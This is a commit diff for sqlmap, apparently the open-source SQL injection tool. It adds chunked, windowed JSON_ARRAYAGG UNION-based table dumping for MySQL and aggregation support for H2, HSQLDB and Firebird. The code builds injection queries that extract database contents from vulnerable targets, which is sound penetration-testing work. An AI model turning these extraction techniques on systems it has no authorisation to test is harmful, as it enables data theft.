Improvements for JSON_AGG retrieval

This commit is contained in:
Miroslav Štampar 2026-06-20 02:28:21 +02:00
parent 497d3772bd
commit 35fefc3b65
5 changed files with 84 additions and 7 deletions

View file

@ -182,14 +182,14 @@ c03dc585f89642cfd81b087ac2723e3e1bb3bfa8c60e6f5fe58ef3b0113ebfe6 lib/core/data.
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py
914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py
31690232f12d0590c8cbea7245ded86875f63c078da99673af4ab7451f0fffcb lib/core/optiondict.py
21b6868afc4570c9d2265427b7ea5fe8ac2e062ead3760ca3494208fde5f5e52 lib/core/option.py
7357efadb3fc8305a1b2a0b1be1915099c5c87bdbe1e95fafcd008043a58039d lib/core/option.py
ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch.py
49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py
03db48f02c3d07a047ddb8fe33a757b6238867352d8ddda2a83e4fec09a98d04 lib/core/readlineng.py
48797d6c34dd9bb8a53f7f3794c85f4288d82a9a1d6be7fcf317d388cb20d4b3 lib/core/replication.py
0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py
888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py
8411f42e10133c779cff837c6e51698cfebe0796f93ca9e3575a5644d64a3e04 lib/core/settings.py
f75f15165173becddf439996a85f011262178e1bf5d2d2bf8028455b7ff3ff94 lib/core/settings.py
cd5a66deee8963ba8e7e9af3dd36eb5e8127d4d68698811c29e789655f507f82 lib/core/shell.py
bcb5d8090d5e3e0ef2a586ba09ba80eef0c6d51feb0f611ed25299fbb254f725 lib/core/subprocessng.py
70ea3768f1b3062b22d20644df41c86238157ec80dd43da40545c620714273c6 lib/core/target.py
@ -212,7 +212,7 @@ c2f34e27578742e729c2fa9c1d4f0a0d8f8f7f4cf0fc14c62ec817a260c71dec lib/parse/site
369484a2999d29f49bf839a329d1686ed94f6ea27c695e027fe08c8da51f30a3 lib/request/basic.py
bc61bc944b81a7670884f82231033a6ac703324b34b071c9834886a92e249d0e lib/request/chunkedhandler.py
390cc4882ba9c76e16a5376ba6d856079e7cb47a3e4ee11925139e637ce05050 lib/request/comparison.py
ec14b5139cd6b03aa167a7b91fab913baf042d4370471390c13eed325eeb245f lib/request/connect.py
b9e2db44d265909792f6cc821ff910727b14aa2d5063c74b0f2ea6d40c4f3d9d lib/request/connect.py
8e06682280fce062eef6174351bfebcb6040e19976acff9dc7b3699779783498 lib/request/direct.py
cf019248253a5d7edb7bc474aa020b9e8625d73008a463c56ba2b539d7f2d8ec lib/request/dns.py
92c81cc31ff4a396723242058fb2152c9e9745f8412d01ea74480b048a53af6c lib/request/httpshandler.py
@ -241,7 +241,7 @@ f522436fbd14bdab090a1d305fcac0361800cb8e36c8cbcb47933298376a71e0 lib/takeover/r
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/__init__.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/union/__init__.py
ceec65f8cb7c3254c4671351c837418c76ac5bc55ccbc40779f67231b54d7085 lib/techniques/union/test.py
9d916ad5d61f9ce467a5ff4b416e61b8ad76d1d950fdd06f23f70a6f7f941a1c lib/techniques/union/use.py
3f834b877f0fb684e402d07af1d8a7c7d0cdb4c0a3f9f15fe8488a08d88db4f2 lib/techniques/union/use.py
aeefb42ea0c68f72744bc1bfd7194ec1bc06480d8a7e23f4b8d3d23fbba2b014 lib/utils/api.py
442555ab85277aff7c9e0cf465ea5b0d28395c326f68363449b2d3941f4b6de2 lib/utils/brute.py
da5bcbcda3f667582adf5db8c1b5d511b469ac61b55d387cec66de35720ed718 lib/utils/crawler.py

View file

@ -2146,6 +2146,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.hintValue = ""
kb.htmlFp = []
kb.huffmanModel = {}
kb.respTruncated = False
kb.huffmanValidated = False
kb.disableHuffman = False
kb.huffmanProbes = 0

View file

@ -20,7 +20,7 @@ from lib.core.enums import OS
from thirdparty import six
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.10.6.130"
VERSION = "1.10.6.131"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@ -226,6 +226,9 @@ MAX_TECHNIQUES_PER_VALUE = 2
# In case of missing piece of partial union dump, buffered array must be flushed after certain size
MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024
# Initial number of rows aggregated per request when a full (single-shot) JSON-agg UNION dump is too large and falls back to chunked windowed aggregation (halved adaptively if a chunk response still gets truncated)
JSON_AGG_CHUNK_ROWS = 1000
# Maximum size of cache used in @cachedmethod decorator
MAX_CACHE_ITEMS = 1024

View file

@ -229,6 +229,7 @@ class Connect(object):
@staticmethod
def _connReadProxy(conn):
parts = []
kb.respTruncated = False
if not kb.dnsMode and conn:
headers = conn.info()
@ -255,6 +256,7 @@ class Connect(object):
singleTimeWarnMessage(warnMsg)
part = re.sub(getBytes(r"(?si)%s.+?%s" % (kb.chars.stop, kb.chars.start)), getBytes("%s%s%s" % (kb.chars.stop, LARGE_READ_TRIM_MARKER, kb.chars.start)), part)
parts.append(part)
kb.respTruncated = True # response exceeded the read cap and was trimmed (signal for chunked UNION dumping)
else:
parts.append(part)
break
@ -262,6 +264,7 @@ class Connect(object):
if sum(len(_) for _ in parts) > MAX_CONNECTION_TOTAL_SIZE:
warnMsg = "too large response detected. Automatically trimming it"
singleTimeWarnMessage(warnMsg)
kb.respTruncated = True
break
if conf.yuge:

View file

@ -50,6 +50,7 @@ from lib.core.enums import HTTP_HEADER
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapSyntaxException
from lib.core.settings import JSON_AGG_CHUNK_ROWS
from lib.core.settings import MAX_BUFFERED_PARTIAL_UNION_LENGTH
from lib.core.settings import NULL
from lib.core.settings import SQL_SCALAR_REGEX
@ -129,7 +130,7 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
retVal = None
else:
retVal = getUnicode(retVal)
elif Backend.isDbms(DBMS.PGSQL):
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.H2, DBMS.HSQLDB, DBMS.FIREBIRD):
output = extractRegexResult(r"(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload))
if output:
retVal = output
@ -150,6 +151,14 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
if retVal:
break
# Detect a single-shot aggregate that was too large to return whole, so the caller can
# switch to chunked (windowed) aggregation: either the response carries the leading
# marker but no trailing one (cut mid-aggregate by sqlmap's cap and/or a silent DBMS
# truncation, regardless of compression), or the DBMS refused it outright with a packet
# size error (e.g. MySQL "Result of json_arrayagg() was larger than max_allowed_packet").
if retVal is None and page and ((kb.chars.start in page and kb.chars.stop not in page) or "max_allowed_packet" in page):
kb.respTruncated = True
else:
# Parse the returned page to get the exact UNION-based
# SQL injection output
@ -237,6 +246,55 @@ def configUnion(char=None, columns=None):
_configUnionChar(char)
_configUnionCols(conf.uCols or columns)
def _chunkedJsonAggUse(expression, expressionFields, expressionFieldsList, count):
"""
Fallback for when a full (single-shot) JSON-agg UNION table dump is too large to be returned
whole (DBMS packet limit / sqlmap response cap). Instead of dropping to the slow per-row UNION
path, rows are aggregated in bounded windows of K rows per request (JSON_ARRAYAGG over a
LIMIT-windowed subquery), keeping near full-UNION throughput while staying well under the
caps. K is halved adaptively if a chunk response still gets truncated. Returns a BigArray of
rows, or None to let the caller fall back to the regular per-row UNION path.
NOTE: MySQL only for now (windowed 'LIMIT offset,K' + JSON_ARRAYAGG); other DBMSes return None.
"""
if not Backend.isDbms(DBMS.MYSQL) or not expressionFields or not expressionFieldsList:
return None
# a stable total ordering (all output columns) so the LIMIT/OFFSET windows never overlap or drop rows
base = re.sub(r"(?i)\s+ORDER BY\s+.+\Z", "", expression)
orderBy = "ORDER BY %s" % ','.join(str(_ + 1) for _ in range(len(expressionFieldsList)))
aggFields = "CONCAT_WS('%s',%s)" % (kb.chars.delimiter, ','.join(agent.nullAndCastField(_) for _ in expressionFieldsList))
debugMsg = "single-shot UNION dump output was too large; switching to "
debugMsg += "chunked (windowed) JSON aggregation of %d entries" % count
singleTimeDebugMessage(debugMsg)
retVal = BigArray()
chunk = JSON_AGG_CHUNK_ROWS
offset = 0
while offset < count:
inner = "%s %s LIMIT %d,%d" % (base, orderBy, offset, chunk)
query = "SELECT CONCAT('%s',JSON_ARRAYAGG(%s),'%s') FROM (%s) AS sqmapx" % (kb.chars.start, aggFields, kb.chars.stop, inner)
kb.jsonAggMode = True
output = _oneShotUnionUse(query, False)
kb.jsonAggMode = False
if kb.respTruncated and chunk > 1:
chunk = max(1, chunk // 2) # a single chunk is still too big -> shrink and retry same window
continue
rows = parseUnionPage(output)
if rows is None:
return None # unexpected failure -> let the caller fall back to the per-row path
retVal.extend(arrayizeValue(rows))
offset += chunk
return retVal
def unionUse(expression, unpack=True, dump=False):
"""
This function tests for an UNION SQL injection on the target
@ -268,7 +326,7 @@ def unionUse(expression, unpack=True, dump=False):
debugMsg += "it does not play well with UNION query SQL injection"
singleTimeDebugMessage(debugMsg)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL, DBMS.SQLITE) and expressionFields and not any((conf.binaryFields, conf.limitStart, conf.limitStop, conf.forcePartial, conf.disableJson)):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL, DBMS.SQLITE, DBMS.H2, DBMS.HSQLDB, DBMS.FIREBIRD) and expressionFields and not any((conf.binaryFields, conf.limitStart, conf.limitStop, conf.forcePartial, conf.disableJson)):
match = re.search(r"SELECT\s*(.+?)\bFROM", expression, re.I)
if match and not (Backend.isDbms(DBMS.ORACLE) and FROM_DUMMY_TABLE[DBMS.ORACLE] in expression) and not re.search(r"\b(MIN|MAX|COUNT|EXISTS)\(", expression):
kb.jsonAggMode = True
@ -282,6 +340,10 @@ def unionUse(expression, unpack=True, dump=False):
query = expression.replace(expressionFields, "STRING_AGG('%s'||%s||'%s','')" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s::text,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1)
elif Backend.isDbms(DBMS.MSSQL):
query = "'%s'+(%s FOR JSON AUTO, INCLUDE_NULL_VALUES)+'%s'" % (kb.chars.start, expression, kb.chars.stop)
elif Backend.getIdentifiedDbms() in (DBMS.H2, DBMS.HSQLDB):
query = expression.replace(expressionFields, "GROUP_CONCAT('%s'||%s||'%s' SEPARATOR '')" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join(agent.nullAndCastField(field) for field in expressionFieldsList), kb.chars.stop), 1)
elif Backend.isDbms(DBMS.FIREBIRD):
query = expression.replace(expressionFields, "LIST('%s'||%s||'%s','')" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join(agent.nullAndCastField(field) for field in expressionFieldsList), kb.chars.stop), 1)
output = _oneShotUnionUse(query, False)
value = parseUnionPage(output)
kb.jsonAggMode = False
@ -336,6 +398,14 @@ def unionUse(expression, unpack=True, dump=False):
return value
if isNumPosStrValue(count) and int(count) > 1:
# The single-shot full UNION dump failed and the table is large (or its oversized
# response was detected as truncated): retrieve the rows in bounded windows via
# chunked JSON aggregation (K rows/request) instead of the slow per-row path below.
if Backend.isDbms(DBMS.MYSQL) and not any((kb.forcePartialUnion, conf.forcePartial, conf.disableJson, conf.binaryFields, conf.limitStart, conf.limitStop)) and (int(count) >= JSON_AGG_CHUNK_ROWS or kb.respTruncated):
chunked = _chunkedJsonAggUse(expression, expressionFields, expressionFieldsList, int(count))
if chunked is not None:
return chunked
threadData = getCurrentThreadData()
try: